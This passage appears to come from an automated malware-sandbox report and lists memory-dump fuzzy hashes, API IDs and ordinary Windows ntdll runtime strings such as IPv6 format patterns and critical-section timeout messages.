                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1a779c980c6863ef78183ffe0fe475f70200b664486f1ba4659b169d2e2bb802
                                                                                                          • Instruction ID: 4f1e2d3ba34b79719b4c948f03160f13317bc2c43d1448542caaec7e91232608
                                                                                                          • Opcode Fuzzy Hash: 1a779c980c6863ef78183ffe0fe475f70200b664486f1ba4659b169d2e2bb802
                                                                                                          • Instruction Fuzzy Hash: AFF0C2706197049FD314EF68C545A1FB7E8FF98710F80465AB8D8DB394E634E900C796
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                          • Instruction ID: ab15c19d389b9d1f2cb8bf18124536dc31a79cfebd9e59defcd6a6087ca6948f
                                                                                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                          • Instruction Fuzzy Hash: 2CF0B472610204AFE714DB25CC01F9BB6E9EF98350F148079A9C5D7164FAB1ED01C654
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                          • Instruction ID: bfe31f92cfdbc8f6096aa8559bfb5d215e15241472cb0813cf8b655aa4cfced0
                                                                                                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                          • Instruction Fuzzy Hash: B2D022323230B0D7CB2956556900FA76909ABC0A90F0A006C340A93804C00C8C82C2E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                          • Instruction ID: 93c621aa1fb0ddaaab15dbe58d1d7a37beb75aef1c81cad5049e4883373ae024
                                                                                                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                          • Instruction Fuzzy Hash: C1D012371E054DBBCB119F66DC41F957BA9E7A4BA0F444020B5048B5A0C63AE950D684
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 620a5434f68021a54cb8b9c6b25cdd2ece2e68d5d116ced24d48be2c3ad4f089
                                                                                                          • Instruction ID: 380a0e60b9cca672a366c807e49d68cf46531340600d4d137ffbee29f6c1bac5
                                                                                                          • Opcode Fuzzy Hash: 620a5434f68021a54cb8b9c6b25cdd2ece2e68d5d116ced24d48be2c3ad4f089
                                                                                                          • Instruction Fuzzy Hash: EFD0A731515149CBEF5ACF08C724D6F7AB8FF20A41B4004BCEB8051120D329EC41D700
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                          • Instruction ID: 98603b9cd1d71adbae83efa34549cf3149abb3d784ae6e6523c919e81d6fe084
                                                                                                          • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                          • Instruction Fuzzy Hash: 96D09235216A80CFD65A8B0CC5A4B1533E8BB84A44F8104D0E481CBB26D668D940CA00
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                          • Instruction ID: 142c17f8ba35ffbc253c04fd808f888abaa4d1b1c44c2e8ab4810bfdca68ac65
                                                                                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                          • Instruction Fuzzy Hash: A5C012322A0648AFC712AA99CD41F427BA9EBA8B40F000021F2048B670C635E820EA84
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                          • Instruction ID: 5132446842fdcbddafe93cd114a205916ef3912fd9e492f51375c302060e1e6b
                                                                                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                          • Instruction Fuzzy Hash: 19D01236100248EFCB01DF41C890DDA7B2AFBD8710F108019FD19076108A31ED62DA50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                          • Instruction ID: 8255ec9667fee1b262e0459a46e8a6ad2326468dc4557a206ff6b9c5693ef028
                                                                                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                          • Instruction Fuzzy Hash: DFC04C797015458FCF15DB19E2D4F4577E8F744750F1508D0E945CB721E624E801CA10
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: af7eff25815665e647eae158285133fa9bdeaadc2c0bacc0f865d082c0e7f9c5
                                                                                                          • Instruction ID: de6573a4a9078b4e406aa8362a8f2966da5cd900a4ea0951955b24e29943fac8
                                                                                                          • Opcode Fuzzy Hash: af7eff25815665e647eae158285133fa9bdeaadc2c0bacc0f865d082c0e7f9c5
                                                                                                          • Instruction Fuzzy Hash: E9900231A0580022A140715888885464005A7E0301B55C022E0824554CCA148A565375
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 84a52e52a310fcb588ae3119b2eef1a0e47778d7aaaefc9436332f265c6dde20
                                                                                                          • Instruction ID: 8e8fc0faad6587dcd220d760092c8312067f2622f6174ba181359c82645df74e
                                                                                                          • Opcode Fuzzy Hash: 84a52e52a310fcb588ae3119b2eef1a0e47778d7aaaefc9436332f265c6dde20
                                                                                                          • Instruction Fuzzy Hash: 7B900261A01500525140715888084066005A7E1301395C126A0954560CC6188955937D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6a1e15c5a471ec700aebaded2adaaef675aad3938455c897ca2d9419042a6cb5
                                                                                                          • Instruction ID: fbd4595d8d98dc4823e6b7fa795c94fc3cf9e210ec35e1e27091093a661dc368
                                                                                                          • Opcode Fuzzy Hash: 6a1e15c5a471ec700aebaded2adaaef675aad3938455c897ca2d9419042a6cb5
                                                                                                          • Instruction Fuzzy Hash: 3290023160140812E10471588808686000597D0301F55C022A6424655ED66589917235
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 171cdb7fa661d662a9a7d590e99550cfb66a92477c11c9708ca446989267cb31
                                                                                                          • Instruction ID: ecd196c31f07090079351baa6229f46c4dfb0e774d625becd41f4b07ff39f8a0
                                                                                                          • Opcode Fuzzy Hash: 171cdb7fa661d662a9a7d590e99550cfb66a92477c11c9708ca446989267cb31
                                                                                                          • Instruction Fuzzy Hash: FF900231A0540812E15071588418746000597D0301F55C022A0424654DC7558B5577B5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 20c7588831c9b253badace2f9aad28c45a8eb5ff828d4e235f4aed99ea43835e
                                                                                                          • Instruction ID: 57d06401c4779c69895fd1166623928b267a743db467c1a45a6a6e59a42e87b2
                                                                                                          • Opcode Fuzzy Hash: 20c7588831c9b253badace2f9aad28c45a8eb5ff828d4e235f4aed99ea43835e
                                                                                                          • Instruction Fuzzy Hash: E790023160544852E14071588408A46001597D0305F55C022A0464694DD6258E55B775
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bc342656c3fb2232fbc040138eb0d03f36bce85c9b5d2ecb2c784c67559eedf5
                                                                                                          • Instruction ID: a4e52be28d6bac75171fd665bedc4fca1ac0295c310e0af44a53de9e0240c36a
                                                                                                          • Opcode Fuzzy Hash: bc342656c3fb2232fbc040138eb0d03f36bce85c9b5d2ecb2c784c67559eedf5
                                                                                                          • Instruction Fuzzy Hash: 4A90023160140812E1807158840864A000597D1301F95C026A0425654DCA158B5977B5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1ed2371f8ade77eef04133f4308f6890f92e0d98d5f693a7152e0fb02672b198
                                                                                                          • Instruction ID: ce63e0f18388df2b3c73e187e18fcf80fe50f5afce2a059a52a653d591799216
                                                                                                          • Opcode Fuzzy Hash: 1ed2371f8ade77eef04133f4308f6890f92e0d98d5f693a7152e0fb02672b198
                                                                                                          • Instruction Fuzzy Hash: AE9002A1601540A25500B258C408B0A450597E0201B55C027E1454560CC52589519239
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e68f6c17df79f536fbf741ae856b2fcdca2446e37ec2bc3a499b90e8f83fcf59
                                                                                                          • Instruction ID: 5f254275852c5678a183339484c9b3593d764e118162c03432650336d08fa9d3
                                                                                                          • Opcode Fuzzy Hash: e68f6c17df79f536fbf741ae856b2fcdca2446e37ec2bc3a499b90e8f83fcf59
                                                                                                          • Instruction Fuzzy Hash: B5900435711400131105F55C470C5070047D7D5351355C033F1415550CD731CD715335
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3b5524216bc8cdd8dc3157f7e034b1a09af3c313fb22d6e812a0f30b3697b32a
                                                                                                          • Instruction ID: 3d763d33acf7803b0daa32cb5d7d5a1af4946586dbd31b795d15574410e604fa
                                                                                                          • Opcode Fuzzy Hash: 3b5524216bc8cdd8dc3157f7e034b1a09af3c313fb22d6e812a0f30b3697b32a
                                                                                                          • Instruction Fuzzy Hash: 8B900225621400121145B558460850B0445A7D6351395C026F1816590CC62189655335
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a071861ee409042fa3cdd6f6d4d3474ec3ed4b5cadd63558b9947f18e5ff7360
                                                                                                          • Instruction ID: 314d3ee337876e3766c9eac76f04b06ff2cbeff3a1cdd3eea2201bc4259d3a3d
                                                                                                          • Opcode Fuzzy Hash: a071861ee409042fa3cdd6f6d4d3474ec3ed4b5cadd63558b9947f18e5ff7360
                                                                                                          • Instruction Fuzzy Hash: 5E90026160180413E14075588808607000597D0302F55C022A2464555ECA298D516239
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fd33ac3044792a9890e82f291a303dca01edb847f5f6eaaf5ee2111a938f3406
                                                                                                          • Instruction ID: 0d230f28c09aa299b0629e421c92af7fbdb4a4a05aab70aef5938a7e607aec17
                                                                                                          • Opcode Fuzzy Hash: fd33ac3044792a9890e82f291a303dca01edb847f5f6eaaf5ee2111a938f3406
                                                                                                          • Instruction Fuzzy Hash: C090022160184452E14072588808B0F410597E1202F95C02AA4556554CC91589555735
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9c5d074c98410b5b5b13f61568548ffb3c075cc57812279f2e5b4c0f0c5de68d
                                                                                                          • Instruction ID: 191113fd4ccb7ebeab7d945aed8436c2c7f70cb65d6181405afa89fb81d388fe
                                                                                                          • Opcode Fuzzy Hash: 9c5d074c98410b5b5b13f61568548ffb3c075cc57812279f2e5b4c0f0c5de68d
                                                                                                          • Instruction Fuzzy Hash: 8590022164140812E1407158C4187070006D7D0601F55C022A0424554DC6168A6567B5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 515af0d1e341be64ea8d3ee256d9ec61601772433a08784c01fefcb78e3a8a07
                                                                                                          • Instruction ID: 47db6235e42f3649182fe71f096440e10a50cb57d36a7e30bcc7559e954a6442
                                                                                                          • Opcode Fuzzy Hash: 515af0d1e341be64ea8d3ee256d9ec61601772433a08784c01fefcb78e3a8a07
                                                                                                          • Instruction Fuzzy Hash: B790022164545112E150715C84086164005B7E0201F55C032A0C14594DC55589556335
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                          • Instruction ID: 88d5b39d2a2274618ce46fc13efde132462e7ce9333afcc162b23dd6d63b7b9b
                                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                          • Instruction Fuzzy Hash:
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                          • API String ID: 48624451-2108815105
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                          • API String ID: 48624451-2108815105
                                                                                                          Strings
                                                                                                          • Execute=1, xrefs: 01094713
                                                                                                          • ExecuteOptions, xrefs: 010946A0
                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01094725
                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01094655
                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01094742
                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010946FC
                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01094787
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                          • API String ID: 0-484625025
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: __aulldvrm
                                                                                                          • String ID: +$-$0$0
                                                                                                          • API String ID: 1302938615-699404926
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: %%%u$[$]:%u
                                                                                                          • API String ID: 48624451-2819853543
                                                                                                          Strings
                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010902E7
                                                                                                          • RTL: Re-Waiting, xrefs: 0109031E
                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010902BD
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                          • API String ID: 0-2474120054
                                                                                                          APIs
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0109728C
                                                                                                          Strings
                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01097294
                                                                                                          • RTL: Re-Waiting, xrefs: 010972C1
                                                                                                          • RTL: Resource at %p, xrefs: 010972A3
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                          • API String ID: 885266447-605551621
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: %%%u$]:%u
                                                                                                          • API String ID: 48624451-3050659472
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $$@
                                                                                                          • API String ID: 0-1194432280